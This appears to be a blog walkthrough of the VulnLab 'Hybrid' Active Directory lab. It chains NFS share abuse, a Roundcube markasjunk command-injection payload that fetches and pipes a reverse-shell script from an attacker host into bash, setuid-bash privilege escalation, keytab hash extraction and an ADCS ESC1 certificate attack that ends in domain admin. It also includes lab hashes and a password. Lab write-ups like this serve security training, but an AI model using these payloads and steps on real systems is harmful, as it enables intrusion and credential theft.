Where Notes Work
HYBRID – VULNLAB
This is the Write-up/Walkthrough of the HYBRID Active Directory Chain Machine from VULNLAB.
NMAP SCAN for Machine 1:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-15 11:38:47Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA/domainComponent=hybrid
| Public Key type: rsa
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| p+yTJRAkzI1unN2+07G/CQlLIcsRty5l+ogVYq6Y4T8kxscOJA==
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA/domainComponent=hybrid
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HYBRID
| NetBIOS_Domain_Name: HYBRID
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: hybrid.vl
| DNS_Computer_Name: dc01.hybrid.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-15T11:39:30+00:00
Domain: HYBRID.VL, BIOS NAME: DC01
Looking at the Domain, Found that this is root domain.
NMAP SCAN for Machine 2:
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60:bc:22:26:78:3c:b4:e0:6b:ea:aa:1e:c1:62:5d:de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLl+dlYZiceVG9g/8U0XSs4cWJ/6msyXPI/mORr9T9i4oQA66eYZSYwrxEwYwDZvrhXu7foZtEdeu3u6uSUnl4k=
| 256 a3:b5:d8:61:06:e6:3a:41:88:45:e3:52:03:d2:23:1b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILJyLrRGDcNfa9bQg1dhsV/CPQapLeRxpWJDUOQ+MI1c
25/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...
110/tcp open pop3 syn-ack Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL PIPELINING AUTH-RESP-CODE RESP-CODES TOP STLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
| SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
|
143/tcp open imap syn-ack Dovecot imapd (Ubuntu)
|_imap-capabilities: more have IDLE LITERAL+ ENABLE LOGINDISABLEDA0001 Pre-login capabilities OK listed SASL-IR ID IMAP4rev1 STARTTLS post-login LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
587/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp open ssl/imap syn-ack Dovecot imapd (Ubuntu)
|_imap-capabilities: more have ID LITERAL+ ENABLE OK capabilities AUTH=PLAIN Pre-login listed SASL-IR AUTH=LOGINA0001 IMAP4rev1 LOGIN-REFERRALS post-login IDLE
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
50001/tcp open mountd syn-ack 1-3 (RPC #100005)
Looking at the Nmap result, found that this is Linux machine joined to the Domain.
Interesting services is running like HTTP, POP, and SMTP.
Going on port 80, it redirects to mail01.hybrid.vl, added domain to /etc/hosts file and landed on Roundcube webmail portal asking for username and password.
Enumerating NFS share on port 2049 using showmount.
showmount -e IP
found a share, and mounted it using mount command.
mount -t nfs IP:/opt/share /mnt/
after extracting the files, in etc/dovecot folder found the username and password roundcube mail portal on port 80.
cat dovecot-users
After logging in, Checked for the Roundcube mail version, and found that it is running 1.6.1, looking for the latest exploit found a RCE exploit with markasjunk plugins, and there was a markasjunk plugin was installed.
To exploit this, first created rev.sh in my attacker machine, and enabled the python server, after that modified the exploit payload for roundcube to fetch rev.sh to the attacker machine and execute it using pipe | bash.
admin&curl${IFS}10.8.0.221/rev.sh${IFS}|bash${IFS}&@hybrid.vl
after that, entered this payload in the admin profile Email and saved it.
after that, logged in as peter.turner and send an email to [email protected].
then, again logged in as admin checking for new message in Inbox, found that peter.turner message, and then clicked on Junk button to transfer to the junk folder.
after clicking on Junk button, got the shell as www-data user
after enumerating more, found two articles, exploiting nfs share for privilege escalation, following this article1 and article2, escalated my privilege to [email protected] user.
checking for the uid of user peter.turner and copied the uid.
www-data@mail01:/opt/share$ id [email protected]
id [email protected]
uid=902601108([email protected]) gid=902600513(domain [email protected]) groups=902600513(domain [email protected]),902601104([email protected])
after that, on my attacker machine created “[email protected]” user and edited /etc/passwd file, and changed the uid and gid to 902601108.
On the victim machine, copied the /bin/bash to /opt/share folder.
www-data@mail01:/opt/share$ cp /bin/bash .
On the attacker machine, I already mounted the nfs share using sudo mount, then spawned the shell as user [email protected] and copied the nfs share bash file to tmp directory, and then removed the bash file from /opt/share as www-data user, after that then transfer the /tmp/bash to /mnt/ directory just to change the write uid and after that set the setuid permission for /mnt/bash file.
sudo su -l [email protected]
#already mount the share using sudo
cp /mnt/bash /tmp/bash
#just to add user rights
#then remove bash from /opt/share using reverse shell as www-data
www-data@mail01:/opt/share$ rm bash
#then on attacker machine transfer /tmp/bash to /mnt/bash
cp /tmp/bash /mnt/bash
#and give permission to bash file which is in /mnt/bash
chmod +s /mnt/bash
#on reverse shell use ./bash -p to get shell as user [email protected]
/opt/share/bash -p
Shell as [email protected]
after getting the user, on peter.turner home directory, there is passwords.kdbx file, downloaded it to my attacker machine, extracted the hash using keeppass2john, and tried cracking the password using john and hashcat, but it didn’t work.
looking forward, I already have two passwords for Roundcube mail, I tried opening the passwords.kdbx file using peter.turner password, and it works.
Using KeePassXC to open passwords.kdbx file and got the password of user peter.turner, now I was able to do SSH to peter.turner.
Checking for sudo permission, found that user peter.turner have ALL rights, used “sudo su” to get the root user, and got the second flag in /root directory.
After enumerating more, searched for domain certificate using certipy and found a vulnerable template certificate.
C:\home\kali\vulnlab\hybrid> certipy find -u [email protected] -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.186.213
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Saved BloodHound data to '20230816041310_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230816041310_Certipy.txt'
[*] Saved JSON output to '20230816041310_Certipy.json'
cat 20230816041310_Certipy.txt
Certificate Templates
0
Template Name : HybridComputers
Display Name : HybridComputers
Certificate Authorities : hybrid-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : HYBRID.VL\Domain Admins
HYBRID.VL\Domain Computers
HYBRID.VL\Enterprise Admins
Object Control Permissions
Owner : HYBRID.VL\Administrator
Write Owner Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Dacl Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Property Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
[!] Vulnerabilities
ESC1 : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
Seeing, the Enrollement Rights found that only Domain Computers have rights, as I have Domain join MAIL01$ machine, enumerating more on MAIL01$, found /etc/krb5.keytab file which use to authenticate to Kerberos without any human interaction or without storing the password.
Transferred the “krb5.keytab” file to my machine and used keytabextract.py to extract information about MAIL01$ and hashes.
python3 keytabextract.py krb5.keytab
C:\home\kali\vulnlab\hybrid> python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458
Using the hash of MAIL01$, Requesting certificate for Template “HybridComputers”, for Administrator UPN(User Principal Name) and setting key-size to 4096, as mentioned “Minimum RSA Key Length”.
Note: Make sure you added dc01.hybrid.vl and hybrid.vl to /etc/hosts file.
certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn '[email protected]' -dns 'dc01.hybrid.vl' -key-size 4096 -debug
Or without adding to /etc/hosts file
certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn '[email protected]' -dc-ip 10.10.186.213 -key-size 4096 -debug
After getting the pfx file (private key), used certipy to authenticate to DC using the private key.
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.186.213
After Entering the command, It asked me to Select “UPN” or “DNS Host Name”, selected UPN by entering 0, and got the hash of the administrator account, after that, and used evil-winrm to log in as the Administrator account.
evil-winrm -u administrator -H 60701e8543c9f6db1a2af3217386d3dc -i 10.10.186.213
If you face any problems, let me know in the comment.